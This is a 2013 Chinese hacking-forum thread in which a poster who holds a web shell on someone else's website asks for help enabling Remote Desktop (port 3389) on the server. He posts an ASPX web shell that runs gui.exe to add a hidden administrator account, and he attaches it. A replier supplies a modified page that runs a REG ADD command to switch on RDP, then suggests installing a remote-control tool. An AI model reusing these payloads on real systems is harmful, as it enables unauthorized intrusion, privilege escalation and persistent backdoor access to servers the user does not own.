查看: 4728|回复: 13

开3389问题

[复制链接]

该用户从未签到

发表于 2013-1-9 16:25:58 | 显示全部楼层 |阅读模式
是这样,
我拿到一个网站的shell  组建不支持也就不能执行命令了,
但是我用一个,
<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false"%>
<%@ import Namespace="System.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<%@ import Namespace="System.Data" %>
<%@ import Namespace="System.Data.OleDb" %>
<%@ import Namespace="Microsoft.Win32" %>
<%@ import Namespace="System.Net.Sockets" %>
<%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %>
<%@ import Namespace="System.DirectoryServices" %>
<%
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.
RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("gui.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user admin hei /add & net localgroup administrators admin /add\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
%>
在网上下载的 aspx文件 还有一gui.exe文件 配合起来创建了帐号. 当然了,这个代码我看不懂.
可是服务器没有开3389.我想能不能写一个开3389的ASPX文件 配合一个开3389的exe文件。
求大神帮帮忙!

1.zip

26.9 KB, 下载次数: 7

这是那个创建帐号的文件

回复

使用道具 举报

  • TA的每日心情

    2020-10-2 23:00
  • 签到天数: 10 天

    [LV.3]偶尔看看II

    发表于 2013-1-9 20:48:45 | 显示全部楼层
    导注册表
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2020-8-3 22:39
  • 签到天数: 84 天

    [LV.6]常住居民II

    发表于 2013-1-9 23:12:54 | 显示全部楼层
    myP.StartInfo.Arguments= " \"REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f\" ";
    测试是否可行

    点评

    直接保存为aspx文件访问么?  详情 回复 发表于 2013-1-9 23:37
    回复 支持 反对

    使用道具 举报

    该用户从未签到

     楼主| 发表于 2013-1-9 23:37:29 | 显示全部楼层
    Free_小东 发表于 2013-1-9 23:12
    myP.StartInfo.Arguments= " \"REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDen ...

    直接保存为aspx文件访问么?

    点评

    把上面的这段代码改成我的这段代码试试  详情 回复 发表于 2013-1-10 12:09
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2020-8-3 22:39
  • 签到天数: 84 天

    [LV.6]常住居民II

    发表于 2013-1-10 12:09:53 | 显示全部楼层
    635634436 发表于 2013-1-9 23:37
    直接保存为aspx文件访问么?

    把上面的这段代码改成我的这段代码试试

    点评

    不明白你的意思=... 说全面一点吧!  详情 回复 发表于 2013-1-10 13:26
    回复 支持 反对

    使用道具 举报

    该用户从未签到

     楼主| 发表于 2013-1-10 13:26:23 | 显示全部楼层
    Free_小东 发表于 2013-1-10 12:09
    把上面的这段代码改成我的这段代码试试

    不明白你的意思=... 说全面一点吧!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2020-8-3 22:39
  • 签到天数: 84 天

    [LV.6]常住居民II

    发表于 2013-1-10 13:45:46 | 显示全部楼层
    [Visual Basic .NET] 纯文本查看 复制代码
    <%@ Page Language="C#" Debug="true" trace="false" validateRequest="false"%>
    <%@ import Namespace="System.IO" %>
    <%@ import Namespace="System.Diagnostics" %>
    <%@ import Namespace="System.Data" %>
    <%@ import Namespace="System.Data.OleDb" %>
    <%@ import Namespace="Microsoft.Win32" %>
    <%@ import Namespace="System.Net.Sockets" %>
    <%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %>
    <%@ import Namespace="System.DirectoryServices" %>
    <%
    System.Diagnostics.Process myP = new System.Diagnostics.Process();
    myP.StartInfo. 
    RedirectStandardOutput = true;
    myP.StartInfo.FileName=Server.MapPath("gui.exe");
    myP.StartInfo.UseShellExecute = false;
    myP.StartInfo.Arguments= " \"REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f\" ";
    myP.Start();
    string output = myP.StandardOutput.ReadToEnd();
    Response.Write(output);
    %>

    点评

    我想你理解错啦,这个东西还配有一个gui.exe文件 ,我用了后不是创建的admin账户是gui账户 也就是说那里的命令是没用的。是gui.exe创建的账户。 你把文件下下去看看吧,  详情 回复 发表于 2013-1-10 14:20
    回复 支持 反对

    使用道具 举报

    该用户从未签到

     楼主| 发表于 2013-1-10 14:20:31 | 显示全部楼层
    Free_小东 发表于 2013-1-10 13:45

    我想你理解错啦,这个东西还配有一个gui.exe文件 ,我用了后不是创建的admin账户是gui账户
    也就是说那里的命令是没用的。是gui.exe创建的账户。
    你把文件下下去看看吧,   

    点评

    既然能执行exe 文件,远控搞定呗  详情 回复 发表于 2013-1-10 21:25
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2020-8-3 22:39
  • 签到天数: 84 天

    [LV.6]常住居民II

    发表于 2013-1-10 21:25:58 | 显示全部楼层
    635634436 发表于 2013-1-10 14:20
    我想你理解错啦,这个东西还配有一个gui.exe文件 ,我用了后不是创建的admin账户是gui账户
    也就是说那里 ...

    既然能执行exe 文件,远控搞定呗

    点评

    如果能执行就好了- - 不能执行的。他是配合在一起用的。 我也不怎么清楚。你把附件拿下去看一下吧  详情 回复 发表于 2013-1-10 21:35
    回复 支持 反对

    使用道具 举报

    该用户从未签到

     楼主| 发表于 2013-1-10 21:35:05 | 显示全部楼层
    Free_小东 发表于 2013-1-10 21:25
    既然能执行exe 文件,远控搞定呗

    如果能执行就好了- - 不能执行的。他是配合在一起用的。 我也不怎么清楚。你把附件拿下去看一下吧
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-26 12:04 , Processed in 0.029831 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部